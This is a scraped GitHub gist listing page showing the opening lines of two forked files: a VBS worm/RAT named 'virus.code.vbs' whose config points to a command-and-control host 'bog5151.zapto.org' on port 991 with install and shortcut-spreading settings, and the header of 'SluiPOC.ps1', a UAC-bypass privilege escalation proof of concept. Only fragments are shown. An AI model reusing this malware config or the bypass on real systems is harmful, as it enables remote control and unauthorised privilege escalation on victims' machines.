s1im3r00
s1im3r00
/ virus.code.vbs
Created
March 7, 2021 06:30
— forked from vakho10/virus.code.vbs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| '<[ recoder : houdini (c) skype : houdini-fx ]> | |
| '=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-= | |
| host = "bog5151.zapto.org" | |
| port = 991 | |
| installdir = "%appdata%" | |
| lnkfile = true | |
| lnkfolder = true |
s1im3r00
/ SluiPOC.ps1
Created
March 5, 2021 10:59
— forked from r00t-3xp10it/SluiPOC.ps1
slui.exe (ChangePK) Privilege escalation POC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .Author: | |
| @r00t-3xp10it - version 1.2 | |
| .Disclosure: | |
| @mattharr0ey | |
| https://medium.com/@mattharr0ey/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b | |
| .DESCRIPTION: | |
| How does Slui UAC bypass work? There is a tool named ChangePK in System32 has a service that opens a window (for you) |
NewerOlder